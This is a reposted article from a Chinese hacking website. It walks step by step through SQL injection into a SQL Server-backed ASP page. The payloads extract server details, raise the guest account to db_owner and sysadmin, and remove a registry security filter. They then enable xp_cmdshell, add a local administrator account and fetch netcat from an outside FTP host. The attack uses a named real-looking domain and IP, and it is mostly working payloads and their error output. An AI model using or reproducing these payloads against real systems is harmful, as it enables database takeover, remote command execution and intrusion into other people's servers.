设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 黑客技术 -> 文章内容 [站内搜索]  

 
利用odbc来拿本机权限
作者:不详  来源:转载  发布时间:2007-5-28 10:09:36  发布人:heigeheapao
WEB/SQL分离 利用ODBC注入一直来很多牛人说可以web/sql分离的情况下,利用odbc来拿本机权限,

不过这篇文章好象是连回本地来做测试。不过总算是一个突破。
EXAMPLE TO USE:?
http://www.xxxx.com/FullStory.asp?id=1?


Exploiting the hole:?
http://www.xxxx.com/FullStory.asp?id=1’?


Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’?
[Microsoft][ODBCSQLServerDriver] [SQLServer]?
Unclosed quotation mark before the character string ’’.?
/Including/general.asp, line 840\?


VERSION?
http://www.xxxx.com/FullStory.asp ... d 1=convert(int,@@version)--?


Code:?

[SQL Server]Syntax error converting the nvarchar value ’Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ’

to a column of data type int.?
/Including/general.asp, line 840?


SERVER NAME?
http://www.xxxx.com/FullStory.asp ... d 1=convert(int,@@servername)--?


Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’UNESCO’ to a column of data type int.?
/Including/general.asp, line 840?


DATABASE NAME?
http://www.xxxx.com/FullStory.asp ... d 1=convert(int,db_name())--?


Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’NhaXinh’ to a column of data type int.?
/Including/general.asp, line 840?

USER?
http://www.XXXX.com/FullStory.asp ... d 1=convert(int,system_user)--?

Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’nhaxinh’ to a column of data type int.?
/Including/general.asp, line 840?


OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp? ... /tsqlref/ts_oa-oz_78z8.asp)?
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset(’sqloledb’,’’;;,’’)--?


Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’?
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider ’sqloledb’ has been denied. You must access this provider through a linked server.?
/Including/general.asp, line 840?


GUEST = DB_OWNER :DDD?
http://www.XXXX.com/FullStory.asp? ... ;sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’ exec sp_msdropretry ’xx update sysusers set sid=0x01 where name=’’dbo’’’,’xx’ exec sp_msdropretry ’xx update dbo.test set sid=0x01,roles=0x01 where name=’’guest’’’,’xx’ exec sp_executesql N’drop view dbo.test’--?


Code:?

?No result expected, normal page loading?
?Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell?


ADDIN TO "BUILTIN\ADMINISTRATORS"?
http://www.nhaxinh.com.vn/FullStory.as ... p;sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ’xx update sysusers set sid=0x01 where name=’’dbo’’’,’xx’ exec sp_msdropretry ’xx update dbo.test set xstatus=18 where name=’’BUILTIN\ADMINISTRATORS’’’,’xx’ exec sp_executesql N’drop view dbo.test’--?


and then?

http://www.xxxx.com/FullStory.asp?id=1;ex ... sp_addsrvrolemember ’nhaxinh’,sysadmin --?

ENABLE OPENROWSET/OLEDB?
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(’sqloledb’,’’;;,’’)--?

Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80004005’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user ’SYSTEM’.?
/Including/general.asp, line 840?


http://www.xxxx.com/FullStory.asp?id=1;e ... .xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Services\Tcpip\Parameters’,’EnableSecurityFilters’?


ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"?
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off exec master..sp_addextendedproc xp_cmd,’’xpsql70.dll’’ exec sp_configure ’’allow updates’’, ’’1’’ reconfigure with override’)?


!!PAY ATTETION TO THE SERVER= PARAMETER?

Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object ’set fmtonly off master..sp_addextendedproc xp_cmd ’xpsql70.dll’ exec sp_configure ’allow updates’, ’1’ reconfigure with override’. The OLE DB provider ’sqloledb’ indicates that the object has no columns.?
/Including/general.asp, line 840?


if dun work try:?
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,’’xpsql70.dll’’ exec sp_configure ’’allow updates’’, ’’1’’ reconfigure with override’)--?


NOW SCRIPT KIDDIES?


http://www.xxxx.com/FullStory.asp?id=1;drop table&nbs ... ble t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell ’ipconfig’--?
http://www.nhaxinh.com.vn/FullStory. ... and 1=convert(int,(select top 1 b from t where b like ’

%25IP Address%25’))-- (%25 == “%”)?

Code:?


Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ’ IP Address. . . . . . . . . . . . : 203.162.7.70 ’ to a column

of data type int.?
/Including/general.asp, line 840?


C:\> ping 203.162.7.70?
Pinging 203.162.7.70 with 32 bytes of data:?
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118?
C:\> ftp 203.162.7.70?
Connected to 203.162.7.70.?
220 unesco Microsoft FTP Service (Version 5.0).?
User (203.162.7.70:(none)):?
203.162.7.70 == panvietnam.com?


http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"’)-- (%26 == "&")?


Code:?

C:\> ftp 203.162.7.70?
Connected to 203.162.7.70.?
220 unesco Microsoft FTP Service?
(Version 5.0).?
User (203.162.7.70:(none)): a?
331 Password required for a.?
Password:?
530 User a cannot log in.?
Login failed.?
ftp> bye?


UPLOAD NETCAT LÊN?
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f’)-- (%3E == ">")?


Code:?

echo open a.b.c.d >f?
echo user a a >>f?
echo bin >> f?
echo cd a >>f?
echo mget * >>f?
echo quit >>f?
ftp -v -i -n -s:f?
del f?


http://www.xxxx.com/FullStory.asp?id=1;drop table&nbs ... ble t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell ’dir nx.exe’--?
http://www.xxxx.com/FullStory.asp ... d 1=convert(int,(select b from t where a=1))--?
http://www.xxxx.com/FullStory.asp ... d 1=convert(int,(select b from t where a=6))--?

Code:?

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ’08/17/2003 11:31a 11,776 nx.exe’ to a column of data type int.?
/Including/general.asp, line 840
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  利用Windows 磁盘配..
新版Windows将有根本..
利用DHCP轻轻松松搞..
雷驰新闻发布系统(任..
利用万象来控制整个..
安全专家:提防利用..
常见漏洞和利用方法..
利用权限甩掉防火墙..
利用自带功能 让XP获..
利用dl函数突破disa..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
最新QQ空间4.0全屏版效果图!!
不用木马,轻松万能偷盗QQ号码
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
新免蟆Q秀,刷红钻的方法
倾情推出QQ空间互踩联盟(免费加入..
本站超级酷的Flash (不看会后悔的..
 
记一次曲折的php入侵 05-29
DL1.EXE U盘病毒的清除教程 05-29
请注意那些容易被忽略的SQL注入技.. 05-29
到底多严重 也来谈诺顿误杀事件.. 05-29
学会如何对Linux服务器进行安全配.. 05-29
搜狐博客三步轻松打造超炫空间 05-29
七招制造安全的Windows XP 操作系.. 05-29
网上将建2.7万个报警岗亭 举报色.. 05-29
分析:杀毒软件厂商如何走出误杀.. 05-29
杀毒商误杀门暴露测试流程缺陷 片.. 05-29
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com